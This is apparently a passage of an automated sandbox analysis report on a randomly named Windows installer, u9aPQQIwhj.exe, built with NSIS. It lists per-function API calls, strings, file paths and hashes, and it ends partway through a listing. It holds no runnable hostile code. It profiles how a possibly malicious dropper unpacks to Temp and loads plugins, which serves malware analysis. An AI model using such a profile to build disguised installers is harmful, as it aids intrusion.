API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 87920c7df50ef61a94b7578fd0a9d958e3cbbc70f9eaf2428e155cfd517307d8
Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
Opcode Fuzzy Hash: 87920c7df50ef61a94b7578fd0a9d958e3cbbc70f9eaf2428e155cfd517307d8
Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

Function 00405F0A Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,?,004051C9,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000), ref: 00405FCD
GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604B
GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 0040605E
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060A8
CoTaskMemFree.OLE32(?), ref: 004060B3
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,?,004051C9,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000), ref: 00406131

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D1
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406019
Call, xrefs: 00405F34, 00406014, 00406035, 0040604A, 0040605D, 00406079, 004060A4, 004060D6, 004060DC, 004060F6, 0040610A, 0040612A, 00406130, 0040613C, 0040616F
Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll, xrefs: 00405F2F

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1064546216
Opcode ID: b2fd181688fdcd7ef8372c6a65a03fcc3ebadb4944a4dbb58e26645ff48e73ec
Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
Opcode Fuzzy Hash: b2fd181688fdcd7ef8372c6a65a03fcc3ebadb4944a4dbb58e26645ff48e73ec
Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

Function 00405770 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 00405799
lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 004057E1
lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 00405804
lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 0040580A
FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 0040581A
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
FindClose.KERNEL32(00000000), ref: 004058C9

Strings

\*.*, xrefs: 004057DB
"C:\Users\user\Desktop\u9aPQQIwhj.exe", xrefs: 00405779
C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\u9aPQQIwhj.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-2939535997
Opcode ID: e6b69e57f949e1376218aa512c161c788fd1e46ec07f5cd4f65730723e5a92ce
Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
Opcode Fuzzy Hash: e6b69e57f949e1376218aa512c161c788fd1e46ec07f5cd4f65730723e5a92ce
Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E

Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\Uploadable\normallnnens\Trskelen,?,?,00000031), ref: 00401793
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\Uploadable\normallnnens\Trskelen,?,?,00000031), ref: 004017B8

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Strings

Call, xrefs: 00401770, 00401779, 00401786, 00401798, 004017A4, 004017DA, 004017F0, 0040180E, 0040184A, 004018CB, 004018D4, 004018DE, 004018E9
C:\Users\user\Uploadable\normallnnens\Trskelen, xrefs: 00401781
C:\Users\user\AppData\Local\Temp\nsh4048.tmp, xrefs: 00401804, 00401822
C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll, xrefs: 00401818, 00401834

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsh4048.tmp$C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll$C:\Users\user\Uploadable\normallnnens\Trskelen$Call
API String ID: 1941528284-112293408
Opcode ID: c934a5f4023ad52aa090981e8ce84fa05bfe414c99e0bb626fd2f32e4f320a2f
Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
Opcode Fuzzy Hash: c934a5f4023ad52aa090981e8ce84fa05bfe414c99e0bb626fd2f32e4f320a2f
Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E

Function 0040653D Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44

Function 0040622B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,74DF2EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0), ref: 00406236
FindClose.KERNEL32(00000000), ref: 00406242

Strings

WB, xrefs: 0040622C

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: WB
API String ID: 2295610775-2854515933
Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD

Function 00406252 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
GetProcAddress.KERNEL32(00000000,?), ref: 00406280

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9

Function 004038B2 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 00403933
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\Uploadable\normallnnens,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B3
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\Uploadable\normallnnens,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
GetFileAttributesW.KERNEL32(Call), ref: 004039D1
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\Uploadable\normallnnens), ref: 00403A1A

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

RegisterClassW.USER32(00428180), ref: 00403A57
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
ShowWindow.USER32(00000005,00000000), ref: 00403ADA
LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AEB
LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
RegisterClassW.USER32(00428180), ref: 00403B1C
DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B

Strings

RichEd32, xrefs: 00403AF1
RichEd20, xrefs: 00403AE6
Control Panel\Desktop\ResourceLocale, xrefs: 004038E6
RichEdit20W, xrefs: 00403AFE, 00403B04
_Nb, xrefs: 00403A36, 00403A9E
Call, xrefs: 0040397A, 00403983, 00403991, 004039E0, 004039E6
"C:\Users\user\Desktop\u9aPQQIwhj.exe", xrefs: 004038B5
RichEdit, xrefs: 00403B0D
.exe, xrefs: 004039C0
C:\Users\user\Uploadable\normallnnens, xrefs: 00403942, 0040394A, 004039ED, 004039F3, 00403A03
.DEFAULT\Control Panel\International, xrefs: 0040391E
C:\Users\user\AppData\Local\Temp\, xrefs: 004038BE
1033, xrefs: 004038D2, 0040392E

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\u9aPQQIwhj.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Uploadable\normallnnens$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 914957316-3479907822
Opcode ID: 026d5a3465d614f87136ed0c1228ce7353d28a0e64fd29dc9081dcfbce6d88a6
Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
Opcode Fuzzy Hash: 026d5a3465d614f87136ed0c1228ce7353d28a0e64fd29dc9081dcfbce6d88a6
Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

Function 00403C55 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
ShowWindow.USER32(?), ref: 00403CAE
DestroyWindow.USER32 ref: 00403CC2
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
GetDlgItem.USER32(?,?), ref: 00403CFF
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
IsWindowEnabled.USER32(00000000), ref: 00403D1A
GetDlgItem.USER32(?,?), ref: 00403DC8
GetDlgItem.USER32(?,00000002), ref: 00403DD2
SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403E3D
GetDlgItem.USER32(?,00000003), ref: 00403EE3
ShowWindow.USER32(00000000,?), ref: 00403F04
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F16
EnableWindow.USER32(?,?), ref: 00403F31
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403F47
EnableMenuItem.USER32(00000000), ref: 00403F4E
SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F66
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
ShowWindow.USER32(?,0000000A), ref: 004040EA

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
Opcode Fuzzy Hash: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

Function 00402DBA Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DCE
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\u9aPQQIwhj.exe,00000400), ref: 00402DEA

Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\u9aPQQIwhj.exe,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\u9aPQQIwhj.exe,C:\Users\user\Desktop\u9aPQQIwhj.exe,80000000,00000003), ref: 00402E33
GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A

Strings

C:\Users\user\Desktop\u9aPQQIwhj.exe, xrefs: 00402DD4, 00402DE3, 00402DF7, 00402E14
C:\Users\user\Desktop, xrefs: 00402E15, 00402E1A, 00402E20
Inst, xrefs: 00402EA1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
"C:\Users\user\Desktop\u9aPQQIwhj.exe", xrefs: 00402DC3
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC7, 00402F92
Null, xrefs: 00402EB3
Error launching installer, xrefs: 00402E0A
soft, xrefs: 00402EAA

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\u9aPQQIwhj.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\u9aPQQIwhj.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-1320270146
Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C

Function 10001B3E Relevance: 20.0, APIs: 13, Instructions: 542stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,?), ref: 10001225

Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,?), ref: 10001260
Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C4A
lstrcpyW.KERNEL32(00000008,?), ref: 10001C92
lstrcpyW.KERNEL32(00000808,?), ref: 10001C9C
GlobalFree.KERNEL32(00000000), ref: 10001CAF
